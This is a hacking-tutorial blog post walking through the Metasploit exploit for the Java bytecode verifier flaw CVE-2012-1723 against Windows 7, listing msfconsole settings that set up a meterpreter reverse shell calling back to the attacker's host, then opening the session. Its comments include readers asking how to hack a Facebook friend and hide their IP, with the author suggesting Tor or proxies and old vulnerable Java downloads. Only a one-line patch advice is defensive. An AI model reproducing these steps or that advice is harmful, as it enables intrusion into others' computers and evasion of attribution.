• 25,450
  • +1,014
  • 2,796
Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Bookmark

Type : Tutorial

Level : Medium

Victim O.S : Windows 7 Ultimate

Attacker O.S : Backtrack 5 R2 with Metasploit Framework v4

CVE : 2012-1723

Credits :    Stefan Cornellius,     # Discoverer
mihi,                  # Vuln analysis
littlelightlittlefire, # metasploit module
juan vazquez,          # merged code (overlapped)
sinn3r                # merged code (overlapped)

Actually I saw this Java Bytecode Verifier Remote Code Execution exploit about 5-6 days ago on exploit database website. It’s very nice exploit btw ๐Ÿ˜› with Excellent Ranking. Here I copy from the exploit description.

This module exploits a vulnerability in HotSpot bytecode verifier where an invalid optimisation of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficent type checks. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.

Btw this Java Bytecode Verifier Remote Code Execution exploit published on July 11, 2012 so it still fresh ๐Ÿ™‚ and the interesting thing was because this is a multi exploit that can affect not only one O.S-es (but I just try only with windows 7). Maybe if you try it with another O.S e.g : linux, mac, etc you can also give your comments here is it work or not.

Requirements :

1. Metasploit Framework with java verifier field access exploit

2. You can download the exploit here http://www.exploit-db.com/exploits/19717/

Step by Step :

Attacker IP Address : 192.168.8.91

Victim IP Address : 192.168.8.90

1. Open your terminal (CTRL+ALT+T) and go to metasploit framework console(msfconsole)

2. Add the Java Bytecode Verifier Remote Code Execution exploit (see image below).

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

3. The next step you need to set up your payload (if your exploit was successfully executed by victim). Because it’s java exploit, so the payload maybe also will use java, but let see the available payload first.

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

From the picture above I use the java/meterpreter/reverse_tcp for the payload.

4. The next step after we successfully set up the payload, we also need to set up the exploit switch options to suit our need. To view the available options you can run show options command (or see picture below).

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

Information :

set srvhost 192.168.8.91 --> set the exploit server ip address

set srvport 80 --> set the exploit server port (because this exploit use browser, 
so we will set it to port 80 or the default web server port)

set uripath "" --> I didn’t set up the URI, just use the original IP address instead.

set lhost 192.168.8.91 --> Set the local ip (attacker ip) in case the exploit 
successfully performed and payload will launched to this ip address

set lport 443 --> Set the local port (attacker port), in which port you want to catch 
the connection from victim

exploit --> perform te exploit (run the server and start the payload)

5. If victim open our malicious URL (http://192.168.8.91) on their browser, here are the screenshot :

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

I run sessions -l command to list an active sessions, and I got 1 active sessions there.

6. The last step to interact with the available sessions, we use sessions -i 1 (because the ID was 1). Here are the screenshot when I successfully perform the exploit.

Java Bytecode Verifier Remote Code Execution to Hack Windows 7 (CVE 2012-1723)

pwned…

Countermeasures :

1. Update your JRE to the latest version (update from java was available for this vulnerability).

Hope it’s useful ๐Ÿ™‚

You can subscribe to get updates from this website directly on your e-mail.

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • mehdi

    [-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.1.3:80).

    what is this?

    • v4L

      #mehdi
      maybe you already has an exploit server running use the same port on the same address.

      • ~rk

        how to stop that ‘already running server’..??

  • annonymous

    nice tutorial but can i hack with it out side the network, for exemple i wanna hack a freind on my facebook..

    • v4L

      #annonymous
      yes and no…as long as you understand the logic of this attack the answer is yes, and vice versa if you don’t.

  • annonymous

    it’s stop like this what’s wrong

    [*] 192.168.1.4 java_verifier_field_access – Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
    [*] 192.168.1.4 java_verifier_field_access – Generated jar to drop (5482 bytes).
    [*] 192.168.1.4 java_verifier_field_access – Sending jar
    [*] 192.168.1.4 java_verifier_field_access – Sending jar
    [*] 192.168.1.4 java_verifier_field_access – Sending jar

    • v4L

      #annonymous
      how about the java version on victim machine? you can find the old JRE here http://oldapps.com

  • well vishnu brother which version of java you are actually using because the session is not being created only the jar is being sent…

    Kindly reply me as soon as possible

    • v4L

      #alive
      sorry I just reply your comment, here’s the details :
      Java Runtime Environment (JRE) component in Oracle Java SE 7 update 4 and earlier, 6 update 32 and earlier, 5 update 35 and earlier, and 1.4.2_37 and earlier

      • alive

        well vishnu brother i hv applied all these updates but it doesn’t work at all.. the sending jar….. sending jar….. somes up but no session is being created……

        what could the basic problem…….

        • v4L

          #alive
          you can try oldapps.com to find the older version of JRE there

  • Russell

    Hi! First of all thanks for every tutorial you have given us! I think you are the BEST!! ๐Ÿ™‚ I have a problem, when I type exploit, I get this error:

    Exploit exception: No such file or directory – /opt/metasploit/msf3/data/exploits/CVE-2012-1723.jar

    What is wrong please? thanks!

    • v4L

      #Russell
      It’s looks like you didn’t have the exploit library.
      how if you run the msfupdate command first?

  • alive

    I have tried the version 4 and 5 but still only the jar files no session has been created

  • curtis

    I tried on 4 different PC…it only works on 1..there were no sessions on the others..why?..is it they are not vunl..or these exploits dont work on most computers anymore??.

    • v4L

      #curtis
      maybe other computer have antivirus / firewall enabled.

  • Rahul

    How to I hide my ip address during penetration testing,if I use USB Dongle GSM SIM Modem???Tell me how I mask my IP address and perform metaspoilt attack ??

    In above article,if victim open my article he can also access the attecker computer???

    • v4L

      #Rahul
      you can use tor or anonymous proxy for that

  • Rahul

    TOR IP address is also dynamic,how tor will forward data to me after attack??

  • Darkmist

    Hi the link you put is no longer working, would you mind posting another link to download it ?

    • v4L

      #Darkmist
      the link still there and working.

  • bali

    hi if the php version of my website not updated so its possible to do that attack?

    • v4L

      #bali
      it has no relations with php, this is client side attack via Java Runtime

    • bali

      hi sir i run my server but url is not working i check it in my other vmware window..
      i scan my site and its show high vuln cz my php version not updated..
      how hacker can take advantage from it
      and thankx for reply

      • v4L

        #bali
        it depends on which vulnerability you’ve already found. usually from this vulnerability the attacker can own your system. you also can google about the vulnerability you found + patch availability.

  • Akash

    Hello sir
    Error: Rex::AddressInUse The address is already in use 
    I have also checked any exploit server running but in vain. Can you please give me any command that can stop any exploit server running. It is blocked after I ran java_signed_applet exploit.
    Thank you for your help